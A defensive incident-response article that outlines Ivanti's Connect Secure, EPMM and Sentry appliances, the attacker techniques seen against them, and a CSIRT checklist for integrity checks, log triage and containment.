Architectural Analysis: The Ivanti Security Ecosystem

Note

Executive Summary: Ivanti is a major software vendor specializing in IT Service Management (ITSM), Unified Endpoint Management (UEM), and Secure Access. For a CSIRT analyst, the name “Ivanti” is synonymous with Secure Access Gateways. These appliances act as the ultimate gatekeepers to corporate networks, making them exceptionally high-value targets for Advanced Persistent Threats (APTs) and ransomware operators. Understanding the Ivanti ecosystem is the first mandatory step before initiating any perimeter breach investigation.

1. Core Ecosystem Components

To investigate an intrusion, analysts must identify which specific Ivanti component is targeted and understand its role within the network architecture.

Ivanti Connect Secure (ICS)

Formerly Pulse Secure. This is the flagship product and the most frequently encountered appliance in DFIR engagements. ICS is an SSL VPN gateway providing secure remote access to corporate resources. Running on a proprietary, hardened “Ivanti OS”, its compromise grants an attacker direct, authenticated access to the internal network.

Ivanti EPMM

Formerly MobileIron Core. EPMM (Endpoint Manager Mobile) is a Mobile Device Management (MDM/UEM) solution. It manages and secures fleets of corporate smartphones and tablets. A compromise here can lead to massive sensitive data theft or serve as a pivot point into the internal network.

Ivanti Sentry

Formerly MobileIron Sentry. An in-line gateway that secures, encrypts, and manages traffic between mobile devices managed by EPMM and enterprise backend services (such as Microsoft Exchange ActiveSync).

2. The Attack Surface: A Zero-Day Magnet

Because Ivanti Connect Secure (ICS) and EPMM appliances must be exposed to the public internet to function, they represent an ideal edge attack surface. They operate as “black boxes” where traditional EDR agents cannot be deployed, offering a blind spot for defenders.

APT Exploitation & TTPs

In recent years (notably spanning 2023 to 2026), a barrage of critical, unauthenticated Remote Code Execution (RCE) vulnerabilities (e.g., CVE-2023-46805, CVE-2024-21887, CVE-2024-21893) were exploited at scale by state-sponsored actors.

Once a zero-day is leveraged to bypass authentication, adversaries typically deploy a consistent set of Tactics, Techniques, and Procedures (TTPs):

• Webshells & Backdoors: Dropping persistent webshells (written in .pl, .cgi, or .py) directly onto the appliance’s file system.
• Credential Harvesting: Modifying the appliance’s legitimate source code (JavaScript or Perl CGI files) to hook the login functions, allowing attackers to steal cleartext passwords and active session cookies of legitimate users as they authenticate.
• Lateral Movement: Utilizing the compromised gateway as an internal proxy to tunnel traffic and launch attacks deep into the corporate network.

3. Incident Response: The CSIRT Checklist

Compromise of an Ivanti appliance is a maximum-severity incident. Because it is a proprietary system, investigation requires highly specific triage methodologies.

1. The Integrity Checker Tool (ICT): This is the absolute first action in any investigation. Provided by Ivanti, the ICT scans the appliance to verify the integrity of its system files against a known-good cryptographic baseline. If the ICT fails or flags modified files, it is definitive proof of compromise.
2. Log Triage (System & Web): Extract complete log snapshots via the administrative interface.
   • User Access Logs: Hunt for impossible travel anomalies, logins at bizarre hours, or brute-force attempts followed by a success.
   • Admin Event Logs: Look for unexpected configuration changes, new account creation, or access to sensitive admin panels.
   • Unauthenticated Web Logs: Hunt for requests containing directory traversal sequences (../) or unusual URI paths associated with exploit attempts.
3. Advanced Appliance Forensics: Acquire a full system snapshot (which captures the file system and configurations).
   • Search the web directories (e.g., /data/runtime/tmp/) for dropped webshells.
   • Audit cron jobs for persistence mechanisms.
   • Review legitimate files modified by attackers (which should correlate with ICT findings).
4. Immediate Containment: If a compromise is strongly suspected, isolate the appliance from the internal network immediately to halt lateral movement, and cross-reference the running OS version against the CISA Known Exploited Vulnerabilities (KEV) catalog.

4. The Ivanti Forensics & Response Hub

To effectively investigate, contain, and remediate Ivanti compromises, the Hermes Codex provides specialized deep-dive guides. Proceed to the following operational modules based on your investigation phase:

• 1. The Terrain: Ivanti Appliance Forensics: Architecture & Versioning — Learn how to navigate the dual-partition system and identify the exact OS build.
• 2. The Traces: Ivanti Log Analysis & Cryptic Parsing — A guide to deciphering proprietary Ivanti logs (log.cgi, user_access.log) and hunting for HTTP attack signatures.
• 3. The Evidence: Artifact Hunting & Webshell Detection — Uncover where attackers hide .jsp and .pl webshells, and how to analyze Integrity Checker Tool (ICT) results.
• 4. Incident Response: Playbook: Investigating CVE-2026-1281 & 1340 (EPMM) — A step-by-step remediation and “scorched earth” containment guide for critical EPMM RCEs.

---

References & Further Reading

• CISA Advisories: Known Exploited Vulnerabilities Catalog
• Related Playbook: EDR Alert Triage (For tracking lateral movement originating from the VPN)